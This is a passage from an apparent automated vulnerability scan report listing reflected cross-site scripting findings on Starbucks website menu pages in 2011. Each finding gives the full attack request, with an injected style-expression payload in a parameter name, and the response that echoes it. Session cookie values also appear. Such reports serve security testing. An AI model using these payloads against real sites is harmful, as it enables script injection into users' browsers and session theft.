The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cd5e"style%3d"x%3aexpression(alert(1))"741f7a7ef73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3cd5e"style="x:expression(alert(1))"741f7a7ef73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-peppermint-mocha?3cd5e"style%3d"x%3aexpression(alert(1))"741f7a7ef73=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:00 GMT
Connection: close
Content-Length: 43056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha?3cd5e"style="x:expression(alert(1))"741f7a7ef73=1"/>
...[SNIP]...

2.129. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e18af"style%3d"x%3aexpression(alert(1))"fb96fc1e474 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e18af"style="x:expression(alert(1))"fb96fc1e474 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha?e18af"style%3d"x%3aexpression(alert(1))"fb96fc1e474=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:04 GMT
Connection: close
Content-Length: 43381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha?e18af"style="x:expression(alert(1))"fb96fc1e474=1"/>
...[SNIP]...

2.130. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-pumpkin-spice-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebcde"style%3d"x%3aexpression(alert(1))"7566495fc72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebcde"style="x:expression(alert(1))"7566495fc72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-pumpkin-spice-latte?ebcde"style%3d"x%3aexpression(alert(1))"7566495fc72=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:25 GMT
Connection: close
Content-Length: 43588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte?ebcde"style="x:expression(alert(1))"7566495fc72=1"/>
...[SNIP]...

2.131. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-skinny-flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63d99"style%3d"x%3aexpression(alert(1))"d163db6da2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 63d99"style="x:expression(alert(1))"d163db6da2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-skinny-flavored-latte?63d99"style%3d"x%3aexpression(alert(1))"d163db6da2d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:55 GMT
Connection: close
Content-Length: 43267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte?63d99"style="x:expression(alert(1))"d163db6da2d=1"/>
...[SNIP]...

2.132. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-toffee-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fbd"style%3d"x%3aexpression(alert(1))"1ea5a8b090d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29fbd"style="x:expression(alert(1))"1ea5a8b090d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-toffee-mocha?29fbd"style%3d"x%3aexpression(alert(1))"1ea5a8b090d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:22 GMT
Connection: close
Content-Length: 43039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha?29fbd"style="x:expression(alert(1))"1ea5a8b090d=1"/>
...[SNIP]...

2.133. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee016"style%3d"x%3aexpression(alert(1))"f40cbb757bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee016"style="x:expression(alert(1))"f40cbb757bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-white-chocolate-mocha?ee016"style%3d"x%3aexpression(alert(1))"f40cbb757bf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:11 GMT
Connection: close
Content-Length: 43213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha?ee016"style="x:expression(alert(1))"f40cbb757bf=1"/>
...[SNIP]...

2.134. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/peppermint-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64dcf"style%3d"x%3aexpression(alert(1))"6458be98685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64dcf"style="x:expression(alert(1))"6458be98685 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/peppermint-mocha?64dcf"style%3d"x%3aexpression(alert(1))"6458be98685=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:17 GMT
Connection: close
Content-Length: 43641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha?64dcf"style="x:expression(alert(1))"6458be98685=1"/>
...[SNIP]...

2.135. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/peppermint-white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7efd8"style%3d"x%3aexpression(alert(1))"53305b3ac5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7efd8"style="x:expression(alert(1))"53305b3ac5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/peppermint-white-chocolate-mocha?7efd8"style%3d"x%3aexpression(alert(1))"53305b3ac5e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:26 GMT
Connection: close
Content-Length: 43432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha?7efd8"style="x:expression(alert(1))"53305b3ac5e=1"/>
...[SNIP]...

2.136. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/pumpkin-spice-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f2e"style%3d"x%3aexpression(alert(1))"93a50fd3873 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4f2e"style="x:expression(alert(1))"93a50fd3873 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/pumpkin-spice-latte?b4f2e"style%3d"x%3aexpression(alert(1))"93a50fd3873=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:49 GMT
Connection: close
Content-Length: 43720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte?b4f2e"style="x:expression(alert(1))"93a50fd3873=1"/>
...[SNIP]...

2.137. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-caramel-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5878"style%3d"x%3aexpression(alert(1))"e44d0e07167 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5878"style="x:expression(alert(1))"e44d0e07167 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/skinny-caramel-macchiato?d5878"style%3d"x%3aexpression(alert(1))"e44d0e07167=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:05 GMT
Connection: close
Content-Length: 43234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato?d5878"style="x:expression(alert(1))"e44d0e07167=1"/>
...[SNIP]...

2.138. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-cinnamon-dolce-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c121"style%3d"x%3aexpression(alert(1))"3bc6692e203 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c121"style="x:expression(alert(1))"3bc6692e203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/skinny-cinnamon-dolce-latte?8c121"style%3d"x%3aexpression(alert(1))"3bc6692e203=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:18 GMT
Connection: close
Content-Length: 43735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte?8c121"style="x:expression(alert(1))"3bc6692e203=1"/>
...[SNIP]...

2.139. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1f1f"style%3d"x%3aexpression(alert(1))"645f16f209c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1f1f"style="x:expression(alert(1))"645f16f209c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/skinny-flavored-latte?c1f1f"style%3d"x%3aexpression(alert(1))"645f16f209c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:04 GMT
Connection: close
Content-Length: 43440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte?c1f1f"style="x:expression(alert(1))"645f16f209c=1"/>
...[SNIP]...

2.140. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/toffee-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec4e2"style%3d"x%3aexpression(alert(1))"d6a9d7dfee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec4e2"style="x:expression(alert(1))"d6a9d7dfee8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/toffee-mocha?ec4e2"style%3d"x%3aexpression(alert(1))"d6a9d7dfee8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:13 GMT
Connection: close
Content-Length: 42936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/toffee-mocha?ec4e2"style="x:expression(alert(1))"d6a9d7dfee8=1"/>
...[SNIP]...

2.141. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b4a"style%3d"x%3aexpression(alert(1))"ce231ac2d92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91b4a"style="x:expression(alert(1))"ce231ac2d92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/white-chocolate-mocha?91b4a"style%3d"x%3aexpression(alert(1))"ce231ac2d92=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:03 GMT
Connection: close
Content-Length: 43180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha?91b4a"style="x:expression(alert(1))"ce231ac2d92=1"/>
...[SNIP]...

2.142. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

